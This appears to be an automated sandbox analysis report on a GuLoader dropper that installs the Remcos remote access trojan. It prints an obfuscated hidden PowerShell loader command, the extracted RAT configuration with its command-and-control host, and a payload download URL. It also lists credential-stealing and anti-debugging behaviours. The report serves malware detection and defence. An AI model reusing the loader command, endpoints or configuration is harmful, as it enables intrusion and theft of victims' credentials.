Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3RBUJ4RX4a.exe

Overview

General Information

Sample name:3RBUJ4RX4a.exe
renamed because original name is a hash value
Original sample name:79334000195ced6c34310eddfb6c63fca9140518aff44b58cf07bda7a4161d2a.exe
Analysis ID:1471802
MD5:48c1df79ab978b3c6e8a0b6b8b5a8c49
SHA1:5d44059dabe7837c70afca7f9421a85c56e3d944
SHA256:79334000195ced6c34310eddfb6c63fca9140518aff44b58cf07bda7a4161d2a
Tags:exeGuLoader
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 3RBUJ4RX4a.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\3RBUJ4RX4a.exe" MD5: 48C1DF79AB978B3C6E8A0B6B8B5A8C49)
    • powershell.exe (PID: 4332 cmdline: "powershell.exe" -windowstyle hidden " $Demele=cat 'C:\Users\user\AppData\Local\forfrdelige\begyndervanskelighederne\Nonfecund.pel';$Selvbetjeningslokaler=$Demele.substring(18427,3);.$Selvbetjeningslokaler($Demele)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wab.exe (PID: 7588 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7688 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\elanfuaqikmdbmdy" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7696 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\goffgnlsvseqesrcrjy" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7716 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qikqhfwlrawvozngjuscbe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7724 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qikqhfwlrawvozngjuscbe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7732 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qikqhfwlrawvozngjuscbe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "kezdns.pro:30303:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-KRPMMI", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
00000005.00000003.2420021569.000000000635C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000005.00000002.4447585075.0000000006350000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000002.4447585075.0000000006332000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000002.00000002.2406017581.0000000008E9E000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: wab.exe PID: 7588JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            Click to see the 2 entries

            System Summary

            barindex
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\elanfuaqikmdbmdy", CommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\elanfuaqikmdbmdy", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7588, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\elanfuaqikmdbmdy", ProcessId: 7688, ProcessName: wab.exe
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4332, TargetFilename: C:\Users\user\AppData\Local\forfrdelige\begyndervanskelighederne\Gloved172\3RBUJ4RX4a.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden " $Demele=cat 'C:\Users\user\AppData\Local\forfrdelige\begyndervanskelighederne\Nonfecund.pel';$Selvbetjeningslokaler=$Demele.substring(18427,3);.$Selvbetjeningslokaler($Demele)" , CommandLine: "powershell.exe" -windowstyle hidden " $Demele=cat 'C:\Users\user\AppData\Local\forfrdelige\begyndervanskelighederne\Nonfecund.pel';$Selvbetjeningslokaler=$Demele.substring(18427,3);.$Selvbetjeningslokaler($Demele)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3RBUJ4RX4a.exe", ParentImage: C:\Users\user\Desktop\3RBUJ4RX4a.exe, ParentProcessId: 7088, ParentProcessName: 3RBUJ4RX4a.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden " $Demele=cat 'C:\Users\user\AppData\Local\forfrdelige\begyndervanskelighederne\Nonfecund.pel';$Selvbetjeningslokaler=$Demele.substring(18427,3);.$Selvbetjeningslokaler($Demele)" , ProcessId: 4332, ProcessName: powershell.exe

            Stealing of Sensitive Information

            barindex
            Source: Registry Key setAuthor: Joe Security: Data: Details: EC 8D DD 96 96 AE FB 52 D0 B9 59 26 3C 6B 9E 19 97 DB 8C C9 CB 10 57 28 8B 93 2E 10 92 FB 94 EB C5 C5 16 F5 75 10 FA 69 E1 80 94 5A 94 DC 0A 75 AF CE B3 3C C9 7A D7 CA FC 09 CC AD EA 0E A8 1A 3F DA 2C E4 2B 58 A1 74 8D AC 87 AD D0 F3 97 60 2C C5 78 78 F0 9B 16 25 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 7588, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-KRPMMI\exepath
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://zakk.co.za/Avira URL Cloud: Label: malware
            Source: https://zakk.co.za/QiUyUWVQVU67.binAvira URL Cloud: Label: malware
            Source: https://zakk.co.za/_QAvira URL Cloud: Label: malware
            Source: https://zakk.co.za/QiUyUWVQVU67.binmAvira URL Cloud: Label: malware
            Source: https://zakk.co.za/QiUyUWVQVU67.binQAvira URL Cloud: Label: malware
            Source: 00000005.00000002.4447585075.0000000006332000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "kezdns.pro:30303:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-KRPMMI", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Source: C:\Users\user\AppData\Local\forfrdelige\begyndervanskelighederne\Gloved172\3RBUJ4RX4a.exeReversingLabs: Detection: 15%
            Source: 3RBUJ4RX4a.exeReversingLabs: Detection: 15%
            Source: Yara matchFile source: 00000005.00000003.2420021569.000000000635C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4447585075.0000000006350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4447585075.0000000006332000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7588, type: MEMORYSTR
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 3RBUJ4RX4a.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 102.218.215.35:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: 3RBUJ4RX4a.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: CallSite.Targetore.pdb, source: powershell.exe, 00000002.00000002.2402607552.0000000007225000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2405027195.000000000840B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2402607552.0000000007204000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.2402607552.0000000007204000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeCode function: 0_2_004065CA FindFirstFileA,FindClose,0_2_004065CA
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeCode function: 0_2_004059F9 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004059F9
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeCode function: 0_2_004027AF FindFirstFileA,0_2_004027AF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,LdrInitializeThunk,lstrlenW,LdrInitializeThunk,lstrlenW,LdrInitializeThunk,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,5_2_21D710F1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_21D76580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,LdrInitializeThunk,5_2_21D76580
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0040AE51 FindFirstFileW,FindNextFileW,6_2_0040AE51
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407EF8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407898

            Networking

            barindex
            Source: Malware configuration extractorURLs: kezdns.pro
            Source: global trafficTCP traffic: 192.168.2.5:49712 -> 95.216.5.32:30303
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 102.218.215.35 102.218.215.35
            Source: Joe Sandbox ViewIP Address: 102.218.215.35 102.218.215.35
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /QiUyUWVQVU67.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: zakk.co.zaCache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /QiUyUWVQVU67.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: zakk.co.zaCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: wab.exe, 00000006.00000002.2459081892.0000000003029000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000003.2456629872.0000000003029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.facebook.com (Facebook)
            Source: wab.exe, 00000006.00000002.2459081892.0000000003029000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000003.2456629872.0000000003029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.yahoo.com (Yahoo)
            Source: wab.exe, 00000005.00000002.4458239600.0000000021D40000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.2436909724.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: wab.exe, wab.exe, 0000000A.00000002.2436909724.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: wab.exe, 00000005.00000002.4458729154.0000000022220000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.2457472373.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: wab.exe, 00000005.00000002.4458729154.0000000022220000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.2457472373.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: zakk.co.za
            Source: global trafficDNS traffic detected: DNS query: kezdns.pro
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: bhv1690.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhv1690.tmp.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: bhv1690.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhv1690.tmp.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhv1690.tmp.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: wab.exe, 00000005.00000002.4447585075.0000000006350000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.4447585075.00000000062F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: wab.exe, 00000005.00000003.2420021569.000000000635C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.4447585075.0000000006350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpRL
            Source: wab.exe, 00000005.00000003.2420021569.000000000635C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.4447585075.0000000006350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
            Source: 3RBUJ4RX4a.exe, 3RBUJ4RX4a.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: 3RBUJ4RX4a.exe, 3RBUJ4RX4a.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.2401325172.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: bhv1690.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0
            Source: powershell.exe, 00000002.00000002.2399206851.0000000004D07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2398432943.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2399206851.0000000004BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.2399206851.0000000004D07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2398432943.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: wab.exe, wab.exe, 0000000A.00000002.2436909724.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: wab.exe, wab.exe, 0000000A.00000002.2436909724.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.2443028000.0000000002D7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: wab.exe, 0000000A.00000002.2443028000.0000000002D7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
            Source: wab.exe, 00000005.00000002.4458239600.0000000021D40000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.2436909724.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: wab.exe, 00000005.00000002.4458239600.0000000021D40000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.2436909724.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: wab.exe, 00000006.00000002.2457952099.00000000027F4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: wab.exe, 0000000A.00000002.2436909724.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: powershell.exe, 00000002.00000002.2399206851.0000000004BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000002.00000002.2401325172.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.2401325172.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.2401325172.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000002.00000002.2399206851.0000000004D07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2398432943.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: wab.exe, 00000006.00000002.2457885552.00000000027BC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.li
            Source: wab.exe, 00000006.00000002.2458568783.0000000002B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth
            Source: wab.exe, 00000006.00000002.2458568783.0000000002B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_a
            Source: wab.exe, 00000006.00000002.2458568783.0000000002B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: wab.exe, 00000006.00000002.2458568783.0000000002B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: wab.exe, 00000006.00000002.2458568783.0000000002B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: wab.exe, 00000006.00000002.2458568783.0000000002B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktope
            Source: wab.exe, 00000006.00000002.2458568783.0000000002B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_l
            Source: wab.exe, 00000006.00000002.2458568783.0000000002B78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.2459081892.0000000003029000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000003.2456629872.0000000003029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: powershell.exe, 00000002.00000002.2401325172.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wab.exe, wab.exe, 0000000A.00000002.2436909724.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: wab.exe, 00000005.00000002.4447585075.00000000062F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zakk.co.za/
            Source: wab.exe, 00000005.00000002.4458008934.00000000214D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://zakk.co.za/QiUyUWVQVU67.bin
            Source: wab.exe, 00000005.00000002.4447585075.0000000006332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zakk.co.za/QiUyUWVQVU67.binQ
            Source: wab.exe, 00000005.00000002.4447585075.0000000006332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zakk.co.za/QiUyUWVQVU67.binm
            Source: wab.exe, 00000005.00000002.4447585075.00000000062F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zakk.co.za/_Q
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownHTTPS traffic detected: 102.218.215.35:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: C:\Users\user\Desktop\3RBUJ4RX4a.exeCode function: 0_2_004054B9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004054B9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,6_2_0040987A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,6_2_004098E2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_00406DFC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,7_2_00406E9F
